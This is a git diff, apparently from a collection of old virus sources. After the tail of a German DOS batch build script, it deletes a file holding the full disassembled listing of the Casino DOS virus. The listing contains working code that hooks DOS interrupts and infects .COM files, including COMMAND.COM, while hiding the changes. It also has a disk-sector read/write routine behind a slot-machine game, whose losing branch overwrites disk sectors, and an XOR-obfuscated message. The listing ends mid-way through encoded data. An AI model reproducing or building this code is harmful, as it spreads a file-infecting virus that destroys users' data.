>> md.inp - @echo g =110 113 >> md.inp - @echo f 110 11e 20 >> md.inp - @echo e 110 '%1' >> md.inp - @echo f 100 10f 90 >> md.inp - @echo a 100 >> md.inp - @echo jmp 120 >> md.inp - @echo nop >> md.inp - @echo nop >> md.inp - @echo nop >> md.inp - @echo mov ax,4c00 >> md.inp - @echo int 21 >> md.inp - @echo. >> md.inp - @echo n _HLV_.com >> md.inp - @echo w >> md.inp - @echo q >> md.inp - @debug < md.inp > nul - @cls - @echo. - @echo ͻ - @echo - @echo MAKEHLV erfolgreich beendet, _HLV_.com wurde erstellt. - @echo - @echo ͼ - @echo. - @goto ende - :nopar - @echo FEHLER ! Mindestens ein Parameter ist erforderlich ! - @echo Syntax : MAKEHLV asmfile [switches] - @goto ende - :noasm - @echo FEHLER ! Die Datei %1.ASM ist nicht zu finden ! - @goto ende - :masm_err - @echo FEHLER ! %1.OBJ konnte nicht erstellt werden ! - @goto ende - :link_err - @echo FEHLER ! %1.EXE konnte nicht erstellt werden ! - @goto ende - :exe2_err - @echo FEHLER ! %1.BIN konnte nicht erstellt werden ! - @goto ende - :cref_err - @echo FEHLER ! %1.REF konnte nicht erstellt werden ! - :ende - -ͼ -# -END diff --git a/c/CASINO (35).ASM b/c/CASINO (35).ASM deleted file mode 100755 index b88bc5f..0000000 --- a/c/CASINO (35).ASM +++ /dev/null 
@@ -1,1428 +0,0 @@ - -PAGE 59,132 - -; -; -; CASINO -; -; Created: 31-Aug-90 -; Version: -; Passes: 9 Analysis Options on: H -; Copyright S & S International, 1990 -; -; - -data_1e equ 60Ch ; (0000:060C=0) -data_2e equ 60Dh ; (0000:060D=0) -data_3e equ 60Eh ; (0000:060E=0) -data_4e equ 60Fh ; (0000:060F=0) -data_5e equ 610h ; (0000:0610=0) -data_6e equ 611h ; (0000:0611=0) -data_7e equ 612h ; (0000:0612=0) -data_8e equ 2 ; (6AE6:0002=0) -data_10e equ 3Bh ; (6AE6:003B=0) -data_11e equ 3Dh ; (6AE6:003D=0) -data_12e equ 3Fh ; (6AE6:003F=0) -data_13e equ 40h ; (6AE6:0040=0) -data_14e equ 41h ; (6AE6:0041=0) -data_15e equ 43h ; (6AE6:0043=6AE6h) -data_16e equ 45h ; (6AE6:0045=0) -data_17e equ 47h ; (6AE6:0047=6AE6h) -data_18e equ 4Dh ; (6AE6:004D=0) -data_19e equ 68h ; (6AE6:0068=0) -data_20e equ 7Eh ; (6AE6:007E=0) -data_21e equ 80h ; (6AE6:0080=0) -data_33e equ 716Eh ; (6AE6:716E=0) - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -casino proc far - -start: - nop -data_23 db 0E9h -data_24 db 48h -data_25 db 7, 'ello - Copyright S & S Intern' - db 'ational, 1990', 0Ah, 0Dh, '$' - db 1Ah - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AA' - db 0E6h - db 'jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - -casino endp - -; -; -; External Entry Point -; -; - -int_24h_entry proc far - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx 
- inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - 
inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - mov ah,9 - mov dx,offset data_25 ; (6AE6:0103=7) - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - int 20h ; Program Terminate - db 0, 0, 0, 0, 0, 0Fh - db 0, 0, 0E9h, 0D3h, 1, 0E9h - db 0, 0, 0, 90h, 0E9h, 78h - db 2Ah, 2Ah, 2Eh, 43h, 4Fh, 4Dh - db 0 - db 
'C:\COMMAND.COM' - db 0, 43h, 4Fh, 4Dh, 4Dh, 41h - db 4Eh, 44h, 0FFh - db 2Eh, 43h, 4Fh, 4Dh - db 15 dup (0) - db 3Fh, 0, 0F0h, 3, 2, 0 - db 0B3h, 4Bh, 0FCh, 91h, 56h, 5 - db 79h, 10h, 0, 0, 0, 0 - db 0, 3 - db 8 dup (3Fh) - db 43h, 4Fh, 4Dh, 3Fh, 8, 0 - db 1Eh, 2, 2Eh, 8Bh, 26h, 68h - db 20h, 0A9h, 8Eh, 1Fh, 15h, 0E8h - db 3, 0, 0 - db 'H1000.COM' - db 9 dup (0) - db 1Fh, 15h, 0A9h, 8Eh, 90h, 90h - db 3Dh, 59h, 4Bh, 75h, 4, 0B8h - db 66h, 6, 0CFh, 80h, 0FCh, 11h - db 74h, 8, 80h, 0FCh, 12h, 74h - db 3, 0EBh, 51h, 90h -loc_2: - cmp al,66h ; 'f' - je loc_4 ; Jump if equal - mov al,66h ; 'f' - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - push ax - push bx - push cx - push dx - push es - mov ah,2Fh ; '/' - int 21h ; DOS Services ah=function 2Fh - ; get DTA ptr into es:bx - mov al,es:[bx+10h] - cmp al,43h ; 'C' - jne loc_3 ; Jump if not equal - mov al,es:[bx+11h] - cmp al,4Fh ; 'O' - jne loc_3 ; Jump if not equal - mov al,es:[bx+12h] - cmp al,4Dh ; 'M' - jne loc_3 ; Jump if not equal - mov ax,es:[bx+24h] - cmp ax,91Ah - jb loc_3 ; Jump if below - sub ax,91Ah - mov cx,ax - push cx - mov cx,10h - mov dx,0 - div cx ; ax,dx rem=dx:ax/reg - pop cx - cmp dx,0 - jne loc_3 ; Jump if not equal - mov es:[bx+24h],cx -loc_3: - pop es - pop dx - pop cx - pop bx - pop ax - iret ; Interrupt return -int_24h_entry endp - -loc_4: - push ax - push bx - push cx - push dx - push si - push di - push bp - push ds - push es - mov bx,cs - mov ds,bx - mov al,0 - mov ds:data_18e,al ; (6AE6:004D=0) - mov al,ds:data_13e ; (6AE6:0040=0) - cmp al,0FFh - jne loc_5 ; Jump if not equal - jmp loc_15 ; (06B2) -loc_5: - mov al,0FFh - mov ds:data_13e,al ; (6AE6:0040=0) - cmp ah,4Bh ; 'K' - je loc_6 ; Jump if equal - cmp ah,36h ; '6' - je loc_7 ; Jump if equal - jmp loc_15 ; (06B2) -loc_6: - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov ds:data_12e,al ; (6AE6:003F=0) - jmp short loc_8 ; (0624) - db 90h -loc_7: - mov ah,19h - int 21h ; 
DOS Services ah=function 19h - ; get default drive al (0=a:) - mov ds:data_12e,al ; (6AE6:003F=0) - cmp dl,0 - je loc_8 ; Jump if equal - dec dl - mov ah,0Eh - int 21h ; DOS Services ah=function 0Eh - ; set default drive dl (0=a:) -loc_8: - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - cmp al,1 - ja loc_9 ; Jump if above - mov ch,0 - push ds - pop es - mov bx,917h - mov al,1 - call sub_3 ; (07DB) - mov al,1 - call sub_4 ; (07EC) - cmp ah,0 - je loc_9 ; Jump if equal - jmp short loc_14 ; (069C) - db 90h -loc_9: - mov ah,2Fh ; '/' - int 21h ; DOS Services ah=function 2Fh - ; get DTA ptr into es:bx - mov ds:data_14e,bx ; (6AE6:0041=0) - mov ds:data_15e,es ; (6AE6:0043=6AE6h) - mov dx,4Eh - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx - mov dx,0Bh - mov cx,3Fh - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_14 ; Jump if carry Set - mov dx,6Ch - call sub_1 ; (06EE) - cmp dl,1 - jne loc_10 ; Jump if not equal - call sub_2 ; (073C) - jmp short loc_14 ; (069C) - db 90h -loc_10: - cmp dl,3 - je loc_11 ; Jump if equal - jmp short loc_14 ; (069C) - db 90h -loc_11: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_12 ; Jump if carry=0 - jmp short loc_14 ; (069C) - db 90h -loc_12: - mov dx,6Ch - call sub_1 ; (06EE) - cmp dl,1 - jne loc_13 ; Jump if not equal - call sub_2 ; (073C) - jmp short loc_14 ; (069C) - db 90h -loc_13: - cmp dl,3 - je loc_11 ; Jump if equal -loc_14: - mov dl,ds:data_12e ; (6AE6:003F=0) - mov ah,0Eh - int 21h ; DOS Services ah=function 0Eh - ; set default drive dl (0=a:) - mov dx,ds:data_14e ; (6AE6:0041=0) - mov bx,ds:data_15e ; (6AE6:0043=6AE6h) - mov ds,bx - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx -loc_15: - mov ah,0 - mov ds:data_13e,ah ; (6AE6:0040=0) - pop es - pop ds - pop bp - pop di - pop si - pop dx - pop cx - pop bx - pop ax -;* jmp far ptr 
loc_1 ;*(0273:1460) - db 0EAh, 60h, 14h, 73h, 2 - db 8Ch, 0CAh, 83h, 0C2h, 10h, 8Eh - db 0DAh, 0BAh, 20h, 0, 0B4h, 41h - db 0CDh, 21h, 0B8h, 21h, 35h, 0CDh - db 21h, 8Ch, 6, 0D4h, 1, 89h - db 1Eh, 0D2h, 1, 0BAh, 82h, 0 - db 0B8h, 21h, 25h, 0CDh, 21h, 0BAh - db 1Bh, 0Ch, 0CDh - db 27h - -; -; SUBROUTINE -; - -sub_1 proc near - mov ax,ds:data_19e ; (6AE6:0068=0) - cmp ax,0F5B9h - ja loc_20 ; Jump if above - mov ax,4300h - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx - test cl,4 - jnz loc_20 ; Jump if not zero - test cl,1 - jz loc_16 ; Jump if zero - and cl,0FEh - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx -loc_16: - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - mov dx,3 - mov cx,1 - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - jnc loc_17 ; Jump if carry=0 - jmp short loc_19 ; (0732) - db 90h -loc_17: - cmp ax,0 - jne loc_18 ; Jump if not equal - jmp short loc_19 ; (0732) - db 90h -loc_18: - mov al,byte ptr ds:data_8e+1 ; (6AE6:0003=0) - cmp al,90h - jne loc_21 ; Jump if not equal -loc_19: - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle -loc_20: - mov dl,3 - retn -loc_21: - mov dl,1 - retn -sub_1 endp - - -; -; SUBROUTINE -; - -sub_2 proc near - mov ax,5700h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ds:data_20e,dx ; (6AE6:007E=0) - mov ds:data_21e,cx ; (6AE6:0080=0) - push bx - call sub_5 ; (07FD) - mov bx,68h - mov ax,[bx] - mov dx,0 - mov bx,10h - div bx ; ax,dx rem=dx:ax/reg - inc ax - mov ds:data_10e,ax ; (6AE6:003B=0) - mul bx ; dx:ax = reg * ax - mov ds:data_11e,ax ; (6AE6:003D=0) - pop bx - mov cx,ds:data_10e ; (6AE6:003B=0) - mov si,35Fh - mov [si],cx - mov cx,0 - mov dx,0 - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,605h - mov cx,4 - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - mov cx,0 - mov dx,ds:data_11e ; (6AE6:003D=0) - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,0 - mov cx,91Ah - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - cmp ax,cx - jb loc_22 ; Jump if below - mov al,ds:data_18e ; (6AE6:004D=0) - cmp al,1 - je loc_22 ; Jump if equal - mov cx,0 - mov dx,0 - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov si,9 - mov ax,ds:data_11e ; (6AE6:003D=0) - add ax,35Ch - sub ax,4 - mov [si],ax - mov dx,7 - mov cx,4 - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx -loc_22: - mov dx,ds:data_20e ; (6AE6:007E=0) - mov cx,ds:data_21e ; (6AE6:0080=0) - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - call sub_6 ; (0813) - retn -sub_2 endp - - -; -; SUBROUTINE -; - -sub_3 proc near - push ax - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov dl,al - pop ax - mov dh,0 - mov cl,1 - mov ah,2 - int 13h ; Disk dl=drive #: ah=func b2h - ; read sectors to memory es:bx - retn -sub_3 endp - - -; -; SUBROUTINE -; - -sub_4 proc near - push ax - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov dl,al - pop ax - mov dh,0 - mov cl,1 - mov ah,3 - int 13h ; Disk dl=drive #: ah=func b3h - ; write sectors from mem es:bx - retn -sub_4 endp - - -; -; SUBROUTINE -; - -sub_5 proc near - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_16e,bx ; (6AE6:0045=0) - mov ds:data_17e,es ; (6AE6:0047=6AE6h) - mov dx,335h - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - retn -sub_5 endp - - -; -; SUBROUTINE -; - -sub_6 
proc near - mov dx,ds:data_16e ; (6AE6:0045=0) - mov cx,ds:data_17e ; (6AE6:0047=6AE6h) - push ds - push cx - pop ds - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - retn -sub_6 endp - - db 50h, 53h, 51h, 52h, 1Eh, 6 - db 0B4h, 0, 0CDh, 13h, 0B4h, 1 - db 88h, 26h, 4Dh, 0, 0BFh, 0FFh - db 0FFh, 8Eh, 6, 49h, 0, 8Bh - db 1Eh, 4Bh, 0, 0B0h, 0, 26h - db 88h, 7, 7, 1Fh, 5Ah, 59h - db 5Bh, 58h, 0CFh, 8Ch, 0CAh, 0B9h - db 3Fh, 0, 3, 0D1h, 83h, 0C2h - db 10h, 8Eh, 0DAh, 0A1h, 3Dh, 0 - db 5, 3, 6, 0BBh, 0FEh, 0FFh - db 2Bh, 0D8h, 89h, 1Eh, 3, 6 - db 0BBh, 5, 6, 8Ah, 7, 2Eh - db 0A2h, 0, 1, 43h, 8Ah, 7 - db 2Eh, 0A2h, 1, 1, 43h, 8Ah - db 7, 2Eh, 0A2h, 2, 1, 43h - db 8Ah, 7, 2Eh, 0A2h, 3, 1 - db 0B4h, 2Ah, 0CDh, 21h, 80h, 0FAh - db 0Fh, 74h, 3, 0E9h, 0A2h, 1 -loc_23: - cmp dh,1 - je loc_24 ; Jump if equal - cmp dh,4 - je loc_24 ; Jump if equal - cmp dh,8 - je loc_24 ; Jump if equal - jmp loc_36 ; (0A33) -loc_24: - call sub_8 ; (09EB) - push ds - pop es - mov si,613h - mov di,613h - mov cx,305h - cld ; Clear direction - -locloop_25: - lodsb ; String [si] to al - sub al,64h ; 'd' - stosb ; Store al to es:[di] - loop locloop_25 ; Loop if cx > 0 - - mov dx,613h - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx -loc_26: - mov ah,7 - int 21h ; DOS Services ah=function 07h - ; get keybd char al, no echo - mov byte ptr ds:data_2e,64h ; (0000:060D=0) 'd' - nop - mov byte ptr ds:data_3e,78h ; (0000:060E=0) 'x' - nop - mov byte ptr ds:data_4e,0B4h ; (0000:060F=0) - nop - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dh=sec - mov bl,dh - mov bh,0 - mov ch,0 - mov dh,0 - add cl,dl - mov ax,cx - mov cl,3 - div cl ; al, ah rem = ax/reg - mov ds:data_5e,ah ; (0000:0610=0) - mov ax,dx - mov dl,3 - div dl ; al, ah rem = ax/reg - mov ds:data_6e,ah ; (0000:0611=0) - mov ax,bx - div dl ; al, ah rem = ax/reg - mov ds:data_7e,ah ; (0000:0612=0) - dec byte ptr ds:data_1e ; 
(0000:060C=0) - mov al,ds:data_1e ; (0000:060C=0) - add al,30h ; '0' - mov dh,0Dh - mov dl,26h ; '&' - mov bx,0 - mov ah,2 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - mov ah,0Eh - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode -loc_27: - mov dx,1FFFh -loc_28: - nop - nop - nop - dec dx - jnz loc_28 ; Jump if not zero - mov al,ds:data_2e ; (0000:060D=0) - cmp al,ds:data_5e ; (0000:0610=0) - je loc_29 ; Jump if equal - mov dl,19h - mov al,ds:data_2e ; (0000:060D=0) - call sub_7 ; (09C9) - mov al,ds:data_2e ; (0000:060D=0) - dec al - mov ds:data_2e,al ; (0000:060D=0) -loc_29: - mov al,ds:data_3e ; (0000:060E=0) - cmp al,ds:data_6e ; (0000:0611=0) - je loc_30 ; Jump if equal - mov dl,21h ; '!' - mov al,ds:data_3e ; (0000:060E=0) - call sub_7 ; (09C9) - dec byte ptr ds:data_3e ; (0000:060E=0) -loc_30: - mov al,ds:data_4e ; (0000:060F=0) - cmp al,ds:data_7e ; (0000:0612=0) - je loc_31 ; Jump if equal - mov dl,29h ; ')' - mov al,ds:data_4e ; (0000:060F=0) - call sub_7 ; (09C9) - dec byte ptr ds:data_4e ; (0000:060F=0) -loc_31: - mov al,ds:data_4e ; (0000:060F=0) - cmp al,ds:data_7e ; (0000:0612=0) - jne loc_27 ; Jump if not equal - mov ah,ds:data_3e ; (0000:060E=0) - cmp ah,ds:data_6e ; (0000:0611=0) - jne loc_27 ; Jump if not equal - mov bl,ds:data_2e ; (0000:060D=0) - cmp bl,ds:data_5e ; (0000:0610=0) - jne loc_27 ; Jump if not equal - cmp al,0 - jne loc_32 ; Jump if not equal - cmp ah,0 - jne loc_32 ; Jump if not equal - cmp bl,0 - jne loc_32 ; Jump if not equal - mov dx,80Ah - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - call sub_9 ; (0A18) - jmp short loc_35 ; (09C7) - db 90h -loc_32: - cmp al,1 - jne loc_33 ; Jump if not equal - cmp ah,1 - jne loc_33 ; Jump if not equal - cmp bl,1 - jne loc_33 ; Jump if not equal - mov dx,88Dh - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - jmp short loc_34 ; (09BD) - db 90h -loc_33: - mov al,ds:data_1e 
; (0000:060C=0) - cmp al,0 - je loc_34 ; Jump if equal - jmp loc_26 ; (08BF) -loc_34: - mov dx,8D6h - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - jmp short loc_35 ; (09C7) - nop -loc_35: - jmp short loc_35 ; (09C7) - -; -; SUBROUTINE -; - -sub_7 proc near - mov ah,0 - push ax - mov dh,0Bh - mov ah,2 - mov bh,0 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - pop ax - mov bl,3 - div bl ; al, ah rem = ax/reg - mov bl,ah - mov bh,0 - add bx,609h - mov al,[bx] - mov ah,0Eh - mov bx,0 - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - retn -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - push ds - mov bx,ds - add bx,1000h - mov ds,bx - mov bx,0 - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov cx,50h - mov dx,0 - int 25h ; Absolute disk read, drive al - popf ; Pop flags - mov bx,0 - mov ds,bx - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov cx,50h - mov dx,0 - int 26h ; Absolute disk write, drive al - popf ; Pop flags - pop ds - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - push ds - mov bx,ds - add bx,1000h - mov ds,bx - mov bx,0 - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov cx,50h - mov dx,0 - int 26h ; Absolute disk write, drive al - popf ; Pop flags - pop ds - retn -sub_9 endp - -loc_36: - mov bx,0 - mov ax,4B59h - int 21h ; DOS Services ah=function 4Bh - ; run progm @ds:dx, parm @es:bx - cmp ax,666h - jne loc_37 ; Jump if not equal - jmp loc_41 ; (0AF0) -loc_37: - push ds - pop es - push ds - push cs - pop ds - mov si,0 - mov di,917h - mov cx,100h - cld ; Clear direction - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - pop ds - mov ah,2Fh ; '/' - int 21h ; DOS Services ah=function 2Fh - ; get DTA ptr into es:bx - mov ds:data_14e,bx ; (6AE6:0041=0) - mov ds:data_15e,es ; (6AE6:0043=6AE6h) - mov dx,4Eh - mov ah,1Ah - int 21h ; 
DOS Services ah=function 1Ah - ; set DTA to ds:dx - mov dx,11h - mov cx,3Fh - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_38 ; Jump if carry Set - mov dx,11h - call sub_1 ; (06EE) - cmp dl,1 - jne loc_38 ; Jump if not equal - call sub_2 ; (073C) -loc_38: - call sub_5 ; (07FD) - mov dx,20h - mov cx,2 - mov ah,3Ch ; '<' - int 21h ; DOS Services ah=function 3Ch - ; create/truncate file @ ds:dx - jc loc_40 ; Jump if carry Set - mov bx,ax - mov dx,0 - mov cx,91Ah - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - push ax - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - pop ax - cmp ax,cx - je loc_39 ; Jump if equal - mov dx,20h - mov ah,41h ; 'A' - int 21h ; DOS Services ah=function 41h - ; delete file, name @ ds:dx - jmp short loc_40 ; (0AD1) - db 90h -loc_39: - push cs - pop es - mov bx,cs:data_8e ; (6AE6:0002=0) - sub bx,92Ch - mov cx,cs - sub bx,cx - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - mov dx,20h - push ds - pop es - mov bx,2Dh - mov ax,4B00h - int 21h ; DOS Services ah=function 4Bh - ; run progm @ds:dx, parm @es:bx -loc_40: - call sub_6 ; (0813) - push cs - pop es - mov di,0 - mov si,917h - mov cx,0FFh - cld ; Clear direction - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - mov dx,ds:data_14e ; (6AE6:0041=0) - mov bx,ds:data_15e ; (6AE6:0043=6AE6h) - mov ds,bx - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx -loc_41: - push cs - pop ds - jmp $-0F32h - jmp $+3DFh - db 48h, 9Bh, 9Ch, 3Fh, 5, 0Ah - db 5, 3, 1, 3, 0, 6Eh - db 71h, 6Dh, 6Dh, 84h, 84h, 84h - db 0A8h, 0ADh, 0B7h, 0AFh, 84h, 0A8h - db 0A9h, 0B7h, 0B8h, 0B6h, 0B3h, 0BDh - db 0A9h, 0B6h, 84h, 5Dh, 84h, 0A5h - db 84h, 0B7h, 0B3h, 0B9h, 0BAh, 0A9h - db 0B2h, 0ADh, 0B6h, 84h, 0B3h, 0AAh - db 84h, 0B1h, 0A5h, 0B0h, 0B8h, 0A5h - db 6Eh, 71h, 6Eh, 71h, 6Dh, 6Dh - db 0ADh, 84h, 0CCh, 
0C5h, 0DAh, 0C9h - db 84h, 0CEh, 0D9h, 0D7h, 0D8h, 84h - db 0A8h, 0A9h, 0B7h, 0B8h, 0B6h, 0B3h - db 0BDh, 0A9h, 0A8h, 84h, 0D8h, 0CCh - db 0C9h, 84h, 0AAh, 0A5h, 0B8h, 84h - db 0D3h, 0D2h, 84h, 0DDh, 0D3h, 0D9h - db 0D6h, 84h, 0A8h, 0CDh, 0D7h, 0CFh - db 84h, 85h, 85h, 6Eh, 71h, 84h - db 84h, 84h, 84h, 84h, 84h, 0ACh - db 0D3h, 0DBh, 0C9h, 0DAh, 0C9h, 0D6h - db 90h, 84h, 0ADh, 84h, 0CCh, 0C5h - db 0DAh, 0C9h, 84h, 0C5h, 84h, 0C7h - db 0D3h, 0D4h, 0DDh, 84h, 0CDh, 0D2h - db 84h, 0B6h, 0A5h, 0B1h, 90h, 84h - db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h - db 0D1h, 84h, 0CBh, 0CDh, 0DAh, 0CDh - db 0D2h, 0CBh, 84h, 0DDh, 0D3h, 0D9h - db 84h, 0C5h, 84h, 0D0h, 0C5h, 0D7h - db 0D8h, 84h, 0C7h, 0CCh, 0C5h, 0D2h - db 0C7h, 0C9h, 6Eh, 71h, 6Dh, 6Dh - db 6Dh, 0D8h, 0D3h, 84h, 0D6h, 0C9h - db 0D7h, 0D8h, 0D3h, 0D6h, 